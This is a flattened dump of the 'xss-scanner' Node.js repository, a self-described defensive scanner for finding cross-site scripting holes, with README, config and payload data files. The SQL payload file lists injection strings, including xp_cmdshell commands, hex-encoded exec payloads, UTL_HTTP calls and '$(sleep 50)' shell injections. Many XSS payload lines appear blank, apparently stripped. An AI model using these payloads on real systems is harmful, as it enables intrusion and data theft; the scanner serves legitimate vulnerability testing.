├── .gitignore ├── .travis.yml ├── LICENSE ├── README.md ├── data ├── payload.sql.txt ├── payload.test.txt └── payload.txt ├── package.json ├── src ├── config.js ├── payload.js └── util.js └── tests └── util.test.js /.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | 6 | # Runtime data 7 | pids 8 | *.pid 9 | *.seed 10 | 11 | # Directory for instrumented libs generated by jscoverage/JSCover 12 | lib-cov 13 | 14 | # Coverage directory used by tools like istanbul 15 | coverage 16 | 17 | # nyc test coverage 18 | .nyc_output 19 | 20 | # Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files) 21 | .grunt 22 | 23 | # node-waf configuration 24 | .lock-wscript 25 | 26 | # Compiled binary addons (http://nodejs.org/api/addons.html) 27 | build/Release 28 | 29 | # Dependency directories 30 | node_modules 31 | jspm_packages 32 | 33 | # Optional npm cache directory 34 | .npm 35 | 36 | # Optional REPL history 37 | .node_repl_history 38 | 39 | # Output 40 | output 41 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: node_js 2 | node_js: 3 | - "6" -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Kristofer Krause 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # xss-scanner 2 | Cross-Site Scripting (XSS) scanner. This tool helps to find possible XSS vulnerabilities. It's intended use is to help "plug" the vulnerability, *not* exploit. Be nice. Make the web better. 3 | 4 | [![Build Status](https://travis-ci.org/dragthor/xss-scanner.svg?branch=master)](https://travis-ci.org/dragthor/xss-scanner) [![npm version](https://badge.fury.io/js/xss-scanner.svg)](https://badge.fury.io/js/xss-scanner) 5 | 6 | The three most important countermeasures to prevent cross-site scripting attacks are to: 7 | 8 | * Constrain input. 9 | * Encode output. 10 | * Filter user input. 11 | 12 | Url encode output URLs if they are constructed from input. 13 | 14 | Html encode output if it contains input from the user or from other sources such as databases. 15 | 16 | Cross platform - macOS, Linux, and Windows. It's also working my Raspberry Pi 3 Model B. 17 | 18 | ## Installation 19 | `npm install` 20 | 21 | ## Configuration 22 | Open up the `config.js` file and configure the `xssOptions()` return object. 23 | 24 | ## Run 25 | `npm start` 26 | 27 | ## Results 28 | The console shows the XSS parameter values that have made it back with a status code 200. You can also dump the resulting Html to a file. Unfortunately, you have to manually check these. I prefer to use the latest version of Firefox with add-ons and extensions disabled. Other XSS tools, such as Burp Suite, also require some manual checking. 29 | 30 | At the top of the Html content, look for a ``. It contains the offending XSS injection payload value. 31 | 32 | ## Additional Resources 33 | 34 | [OWASP XSS Cheatsheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet) 35 | 36 | -------------------------------------------------------------------------------- /data/payload.sql.txt: -------------------------------------------------------------------------------- 1 | ' 2 | a' or 1=1-- 3 | "a"" or 1=1--" 4 | or a = a 5 | a' or 'a' = 'a 6 | 1 or 1=1 7 | a' waitfor delay '0:0:10'-- 8 | 1 waitfor delay '0:0:10'-- 9 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 10 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 11 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 12 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 13 | a' 14 | ? 15 | ' or 1=1 16 | or 1=1 -- 17 | x' AND userid IS NULL; -- 18 | x' AND email IS NULL; -- 19 | anything' OR 'x'='x 20 | x' AND 1=(SELECT COUNT(*) FROM tabname); -- 21 | x' AND members.email IS NULL; -- 22 | x' OR full_name LIKE '%Bob% 23 | 23 OR 1=1 24 | '; exec master..xp_cmdshell 'ping 172.10.1.255'-- 25 | ' 26 | '%20or%20''=' 27 | '%20or%20'x'='x 28 | %20or%20x=x 29 | ')%20or%20('x'='x 30 | 0 or 1=1 31 | ' or 0=0 -- 32 | " or 0=0 -- 33 | or 0=0 -- 34 | ' or 0=0 # 35 | or 0=0 #" 36 | or 0=0 # 37 | ' or 1=1-- 38 | " or 1=1-- 39 | ' or '1'='1'-- 40 | ' or 1 --' 41 | or 1=1-- 42 | or%201=1 43 | or%201=1 -- 44 | ' or 1=1 or ''=' 45 | or 1=1 or ""= 46 | ' or a=a-- 47 | or a=a 48 | ') or ('a'='a 49 | ) or (a=a 50 | hi or a=a 51 | hi or 1=1 --" 52 | hi' or 1=1 -- 53 | hi' or 'a'='a 54 | hi') or ('a'='a 55 | "hi"") or (""a""=""a" 56 | 'hi' or 'x'='x'; 57 | @variable 58 | ,@variable 59 | PRINT 60 | PRINT @@variable 61 | select 62 | insert 63 | as 64 | or 65 | procedure 66 | limit 67 | order by 68 | asc 69 | desc 70 | delete 71 | update 72 | distinct 73 | having 74 | truncate 75 | replace 76 | like 77 | handler 78 | bfilename 79 | ' or username like '% 80 | ' or uname like '% 81 | ' or userid like '% 82 | ' or uid like '% 83 | ' or user like '% 84 | exec xp 85 | exec sp 86 | '; exec master..xp_cmdshell 87 | '; exec xp_regread 88 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 89 | --sp_password 90 | \x27UNION SELECT 91 | ' UNION SELECT 92 | ' UNION ALL SELECT 93 | ' or (EXISTS) 94 | ' (select top 1 95 | '||UTL_HTTP.REQUEST 96 | 1;SELECT%20* 97 | to_timestamp_tz 98 | tz_offset 99 | <>"'%;)(&+ 100 | '%20or%201=1 101 | %27%20or%201=1 102 | %20$(sleep%2050) 103 | %20'sleep%2050' 104 | char%4039%41%2b%40SELECT 105 | '%20OR 106 | 'sqlattempt1 107 | (sqlattempt2) 108 | | 109 | %7C 110 | *| 111 | %2A%7C 112 | *(|(mail=*)) 113 | %2A%28%7C%28mail%3D%2A%29%29 114 | *(|(objectclass=*)) 115 | %2A%28%7C%28objectclass%3D%2A%29%29 116 | ( 117 | %28 118 | ) 119 | %29 120 | & 121 | %26 122 | ! 123 | %21 124 | ' or 1=1 or ''=' 125 | ' or ''=' 126 | x' or 1=1 or 'x'='y 127 | / 128 | // 129 | //* 130 | */* 131 | a' or 3=3-- 132 | "a"" or 3=3--" 133 | ' or 3=3 134 | or 3=3 -- 135 | -------------------------------------------------------------------------------- /data/payload.test.txt: -------------------------------------------------------------------------------- 1 | \"-alert(123456789))// 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | “> 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /data/payload.txt: -------------------------------------------------------------------------------- 1 | \"-alert(123))// 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | “> 10 | 11 | 12 | 13 | ‘; alert(1); 14 | ‘)alert(1);// 15 | 16 | 17 | 18 | 19 | 20 | 21 | 89 | 92 | 93 | click 94 | 95 | 102 | 103 | 104 | 107 | --!> 112 | 113 |
x 114 | "> 115 |